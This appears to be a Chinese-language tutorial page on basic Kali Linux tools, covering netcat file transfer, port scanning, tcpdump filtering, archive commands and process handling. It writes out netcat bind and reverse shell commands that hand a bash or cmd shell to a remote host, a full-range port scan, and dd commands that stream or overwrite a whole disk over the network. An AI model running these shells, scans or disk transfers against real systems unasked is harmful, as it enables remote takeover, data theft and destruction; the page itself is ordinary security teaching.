kali基本工具的使用

Netcat文件傳輸工具(NC)

  1. windowns安裝nc:將下載好的nc.exe文件放到windows下(也可以在/usr/share/windows-binaries/nc.exe得到nc.exe文件):         C:\Windows\System32目錄
  2. Windwos下使用命令:

發送端:nc –n ip port < yyy                                                      接收端:nc –n –l –p port –vv > xxx

發送端:nc –n ip port < yyy                                                      接收端:nc –n –l –p port –vv –w 3 > xxx

發送端:nc –n –l –p port –vv –w 3 < xxx          windows                         接收端:nc –n ip port > yyy                      linux

發送端:nc –q 1 –lp 333 < xxx                   linux                         接收端:nc –n ip port > yyy               windows

  1. Linux下使用的命令:

傳輸文件:                                                                       A: nc –l –p 4444 >1.mp4                                                                                           B: nc –nv 1.1.1.1 4444 <1.mp4 –q 1

A:nc –q 1 –lp 333 < a.mp4                                                B:nc –nv 1.1.1.1 333 >2.mp4

傳輸目錄:                                                                 A:tar –cvf – music/ | nc –lp 333 –q 1                           B:nc –nv 1.1.1.1 333 | tar –xvf –

加密傳文件:                                                                                    A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4 B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

流媒體服務:                                                                                    A: cat 1.mp4 | nc -lp 333                                                                        B: 1.1.1.1 333 | mplayer -vo x11 -cache 3000 –

端口掃描:                                                                                      nc -nvz 1.1.1.1 1-65535                                                         nc –vnzu 1.1.1.1 1-1024

遠程克隆硬盤:                                                                                 A: nc -lp 333 | dd of=/dev/sda                                                    B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1

遠程控制:  (正向)                                                                                     A:nc -lp 333 -c bash                                                                                                                                         B:nc 1.1.1.1 333

                   (反向)

A: nc -lp 333                                                                     B:nc 1.1.1.1 333 -c bash                                                    注:Windows⽤戶把bash改成cmd;

TCPDUMP——抓包

                  抓包:tcpdump -i eth0 -s 0 -w file.pcap                                                    讀取抓包⽂件:Tcpdump -r file.pcap

                  TCPDUMP——篩選

                      • tcpdump -n -r http.cap | awk '{print $3}'| sort –u                                   • tcpdump -n src host 145.254.160.237 -r http.cap                                  • tcpdump -n dst host 145.254.160.237 -r http.cap                              • tcpdump -n port 53 -r http.cap                                                                    • tcpdump -nX port 80 -r http.cap

                  TCPDUMP——⾼級篩選

                         • tcpdump -A -n 'tcp[13] = 24' -r http.cap

linux壓縮和解壓縮命令大全

linux壓縮和解壓縮命令大全

tar命令

  解包:tar zxvf FileName.tar

  打包:tar czvf FileName.tar DirName

gz命令

  解壓1:gunzip FileName.gz

  解壓2:gzip -d FileName.gz

  壓縮:gzip FileName

  .tar.gz 和 .tgz

  解壓:tar zxvf FileName.tar.gz

  壓縮:tar zcvf FileName.tar.gz DirName

   壓縮多個文件:tar zcvf FileName.tar.gz DirName1 DirName2 DirName3 ...

bz2命令

  解壓1:bzip2 -d FileName.bz2

  解壓2:bunzip2 FileName.bz2

  壓縮: bzip2 -z FileName

  .tar.bz2

  解壓:tar jxvf FileName.tar.bz2

  壓縮:tar jcvf FileName.tar.bz2 DirName

bz命令

  解壓1:bzip2 -d FileName.bz

  解壓2:bunzip2 FileName.bz

  壓縮:未知

  .tar.bz

  解壓:tar jxvf FileName.tar.bz

Z命令

  解壓:uncompress FileName.Z

  壓縮:compress FileName

  .tar.Z

  解壓:tar Zxvf FileName.tar.Z

  壓縮:tar Zcvf FileName.tar.Z DirName

zip命令

  解壓:unzip FileName.zip

壓縮:zip FileName.zip DirName

kali其他命令

  1. 查看端口占用服務:
    1. netstat -nltp |grep 8080 #root
    2. sudo netstat -nltp | grep 3306 #普通
    3. sudo fuser -k 5000/tcp #殺死進程端口
    4. ps aux | grep python /ps -ef|grep java|grep -v grep#查看進程
    5. kill -9 1316 #殺死進程
    6. dpkg –L 文件名
    7. 運行python腳本記得安裝:sudo pip3 install scapy
    8. Scapy包下IPtcpall.IPall.TCP

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章